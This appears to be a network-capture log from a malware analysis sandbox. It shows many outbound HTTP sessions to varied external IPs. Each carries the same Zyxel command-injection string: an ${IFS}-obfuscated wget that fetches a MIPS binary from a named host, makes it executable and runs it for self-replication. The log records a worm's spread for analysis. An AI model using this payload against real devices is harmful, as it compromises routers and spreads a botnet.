                                            Jan 14, 2024 15:50:40.433243990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4521192.168.2.235233469.141.229.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433264971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4522192.168.2.234821052.157.210.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433300972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4523192.168.2.2346794115.102.174.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433331013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4524192.168.2.235000052.186.39.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433351040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4525192.168.2.2355914130.225.65.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433386087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4526192.168.2.233974063.10.245.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433408976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4527192.168.2.2347760159.203.126.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433425903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4528192.168.2.235636252.10.226.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433473110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4529192.168.2.2349928222.98.103.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433526993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4530192.168.2.234782259.148.162.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433546066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4531192.168.2.2352004181.219.189.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433551073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4532192.168.2.2348052125.43.52.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433583021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4533192.168.2.2346816184.58.243.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433619022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4534192.168.2.2347068211.37.57.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433648109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4535192.168.2.2337348104.66.15.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433666945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4536192.168.2.2349044109.243.102.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433705091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4537192.168.2.233520837.140.239.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433734894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4538192.168.2.233308696.28.55.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433737040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4539192.168.2.2350498131.19.18.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433762074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4540192.168.2.2346310144.176.235.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433785915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4541192.168.2.2348810189.13.179.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433810949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4542192.168.2.235930686.30.138.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433835983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4543192.168.2.235036285.147.81.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433880091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4544192.168.2.2350576144.91.137.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433904886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4545192.168.2.2344086118.184.151.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433928967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4546192.168.2.2347062190.152.46.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.433998108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4547192.168.2.2354880104.59.187.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434025049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4548192.168.2.2339954183.15.96.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434050083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4549192.168.2.235788820.195.182.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434082031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4550192.168.2.2343360119.126.223.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434151888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4551192.168.2.2344128189.95.191.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434163094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4552192.168.2.2343308219.38.212.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434196949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4553192.168.2.2355486223.238.224.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434215069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4554192.168.2.2338710208.222.221.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434233904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4555192.168.2.2357526161.187.207.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434283018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4556192.168.2.2357458133.97.92.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434309959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4557192.168.2.2349010143.127.155.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434355974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4558192.168.2.235105647.203.159.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434379101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4559192.168.2.235867680.16.244.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434438944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4560192.168.2.2343518169.153.255.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434452057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4561192.168.2.233831293.97.241.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434484005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4562192.168.2.234141290.146.14.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434503078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4563192.168.2.235016290.71.52.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434546947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4564192.168.2.2347744122.21.66.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434575081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4565192.168.2.233482648.140.156.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434597969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4566192.168.2.23392304.188.142.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434626102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4567192.168.2.2353916124.25.29.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434626102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4568192.168.2.2351936104.110.57.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434653044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4569192.168.2.235499453.117.142.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434683084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4570192.168.2.2345482137.204.171.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434720039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4571192.168.2.2351390199.206.159.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434763908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4572192.168.2.2353062198.49.59.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434792042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4573192.168.2.234042246.152.234.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434806108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4574192.168.2.2336658105.13.52.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434875965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4575192.168.2.2346730114.130.4.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434895992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4576192.168.2.233683485.45.243.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434923887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4577192.168.2.2351324118.136.130.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434969902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4578192.168.2.2346528160.21.9.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.434998035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4579192.168.2.236013425.105.160.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435019970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4580192.168.2.233310667.162.42.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435045958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4581192.168.2.233441499.172.180.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435075998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4582192.168.2.235141862.14.33.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.435120106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4583192.168.2.2360060183.106.223.146443
                                            TimestampBytes transferredDirectionData
